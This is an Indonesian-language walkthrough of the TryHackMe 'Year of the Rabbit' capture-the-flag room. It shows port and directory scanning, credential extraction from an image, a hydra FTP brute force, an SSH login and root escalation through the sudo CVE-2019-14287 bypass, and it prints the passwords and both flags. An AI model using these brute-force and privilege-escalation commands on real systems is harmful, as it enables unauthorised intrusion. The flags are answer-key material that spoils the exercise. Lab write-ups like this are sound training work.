Saatnya memasuki Warren ...
Mari kita memiliki awal yang baik untuk tahun baru!
Bisakah Anda meretas ke tahun kotak kelinci tanpa jatuh ke lubang?
(Harap pastikan volume Anda muncul!)
Apa bendera pengguna?
Lakukan scanning port
┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sV -sC -Pn -T5 10.10.80.158
[sudo] password for cyber:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 00:05 WIT
Warning: 10.10.80.158 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.80.158
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.00 seconds
Masukan Ip Manchin ke browser
Brute force direktori dengan Gobuster atau Dirbuster
┌─[cyber@cyber]─[~]
└──╼ $gobuster dir -u http://10.10.80.158 -w node-dirbuster/lists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[] Url: http://10.10.80.158
[] Threads: 10
[] Wordlist: node-dirbuster/lists/directory-list-2.3-medium.txt
[] Status codes: 200,204,301,302,307,401,403
[] User Agent: gobuster/3.0.1
[] Timeout: 10s
===============================================================
2021/03/17 00:10:44 Starting gobuster
===============================================================
/assets (Status: 301)
Progress: 1509 / 220562 (0.68%)^C
[] Keyboard interrupt detected, terminating.
===============================================================
2021/03/17 00:11:35 Finished
===============================================================
Masukan direktori /assets di browser
Hati-hati terjebak dengan videonya. Selanjutnya klik style.css, di file css ini terlihat satu direktori:
Lalu masuk di direktori tersebut.
Pada tahap ini memastikan kita untuk menonaktifkan javascript di browser dari true ke false.
Setelah di nonaktifkan akan muncul halaman seperti dibbawah ini:
Disini harus perlu di perhatikan, karna ada satu direktori yang tersembunnyi.
klik kanan lalu inspec element.
Masukan direktori tersembunyi tersebut di browser.
Lalu download gambar Hot_Babe.png
Kita akan mencari sesuatu di dalam gambar tersebut, entah apa itu.
Jalankan perintah berikut:
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $ls
Hot_Babe.png
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $strings Hot_Babe.png | grep 'user'
Eh, you've earned this. Username for FTP is ftpuser
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $strings Hot_Babe.png | grep 'pass'
One of these is the password:
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $strings Hot_Babe.png > password
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $cat password
Ms^ *Q4
XDV$
Ap(*
IEND
Ot9RrG7h2~24?
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
5dpv#Pr$wqH7F
1G8Ucoce1+gS5
0plnI%f0~Jw71
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $sed -n '/^One of these is the password:$/ { :a; n; p; ba;}' password > key
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $cat key
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
5dpv#Pr$wqH7F
Brute force ftp, dengan user = ftpuser dan password adalah key
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $ls
Hot_Babe.png key password
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $hydra -V -l ftpuser ftp://10.10.80.158 -P key
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-17 01:15:35
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.80.158:21/
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "Mou+56n%QK8sr" - 1 of 82 [child 0] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "1618B0AUshw1M" - 2 of 82 [child 1] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "5dpv#Pr$wqH7F" - 15 of 82 [child 14] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "1G8Ucoce1+gS5" - 16 of 82 [child 15] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "0plnI%f0~Jw71" - 17 of 82 [child 6] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "CR-ItthsH%9du" - 36 of 82 [child 0] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "yP9kft386bB8G" - 37 of 82 [child 1] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "A-*eE3L@!4W5o" - 38 of 82 [child 2] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "GoM^$82l&GA5D" - 39 of 82 [child 4] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "1t$4$g$I+V_BH" - 40 of 82 [child 5] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "0XxpTd90Vt8OL" - 41 of 82 [child 6] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "j0CN?Z#8Bp69_" - 42 of 82 [child 9] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "G#h~9@5E5QA5l" - 43 of 82 [child 10] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "DRWNM7auXF7@j" - 44 of 82 [child 11] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "Fw!if_=kk7Oqz" - 45 of 82 [child 12] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "92d5r$uyw!vaE" - 46 of 82 [child 13] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "c-AA7a2u!W2*?" - 47 of 82 [child 14] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "zy8z3kBi#2e36" - 48 of 82 [child 15] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "J5%2Hn+7I6QLt" - 49 of 82 [child 8] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "gL$2fmgnq8vI*" - 50 of 82 [child 0] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "Etb?i?Kj4R=QM" - 51 of 82 [child 1] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "7CabD7kwY7=ri" - 52 of 82 [child 2] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "4uaIRX~-cY6K4" - 53 of 82 [child 3] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "kY1oxscv4EB2d" - 54 of 82 [child 4] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "k32?3^x1ex7#o" - 55 of 82 [child 5] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "ep4IPQ_=ku@V8" - 56 of 82 [child 6] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "tQxFJ909rd1y2" - 57 of 82 [child 7] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "5L6kpPR5E2Msn" - 58 of 82 [child 9] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "65NX66Wv~oFP2" - 59 of 82 [child 10] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "LRAQ@zcBphn!1" - 60 of 82 [child 11] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "V4bt3*58Z32Xe" - 61 of 82 [child 12] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "ki^t!+uqB?DyI" - 62 of 82 [child 13] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "5iez1wGXKfPKQ" - 63 of 82 [child 14] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "nJ90XzX&AnF5v" - 64 of 82 [child 15] (0/0)
[21][ftp] host: 10.10.80.158 login: ftpuser password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-17 01:15:52
Login dengan ftp
Ternyata ada file Eli's_Creds.txt dan lihat isi dari file tersebut.
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $ls
"Eli's_Creds.txt" Hot_Babe.png key password
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $cat Eli's_Creds.txt
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $
Ternyata isi file-nya adalah enkripsi Brainfuck , Kemudian deckrip isi file tersebut.
Sekarang lakukan login ssh dengan user dan password yang telah di dapat.
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $ssh eli@10.10.80.158
The authenticity of host '10.10.80.158 (10.10.80.158)' can't be established.
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.80.158' (ECDSA) to the list of known hosts.
[email protected]'s password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
eli@year-of-the-rabbit:~$
Sekarang kita cari flag user.
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
Cari direktori s3cr3t
eli@year-of-the-rabbit:~$ find / -type d -name 's3cr3t' 2> /dev/null
/usr/games/s3cr3t
^C
eli@year-of-the-rabbit:~$ cd /usr/games/s3cr3t
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls -lAh
total 4.0K
-rw-r--r-- 1 root root 138 Jan 23 2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat ./.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls /home/
eli gwendoline
eli@year-of-the-rabbit:/usr/games/s3cr3t$ su gwendoline
Password:
su: Authentication failure
eli@year-of-the-rabbit:/usr/games/s3cr3t$ su - gwendoline
Password:
gwendoline@year-of-the-rabbit:~$ ls
user.txt
gwendoline@year-of-the-rabbit:~$ cat user.txt
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
gwendoline@year-of-the-rabbit:~$
Answare = THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
Apa itu bendera root?
Sekarang eskalasi hak istimewa
gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
gwendoline@year-of-the-rabbit:~$
cve-2019-14287 - whitesourcesoftware
gwendoline@year-of-the-rabbit:~$ sudo --version
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
gwendoline@year-of-the-rabbit:~$
exploitasi dengan !/bin/sh
gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
enter
ls /root/ root.txt cat /root/root.txt THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}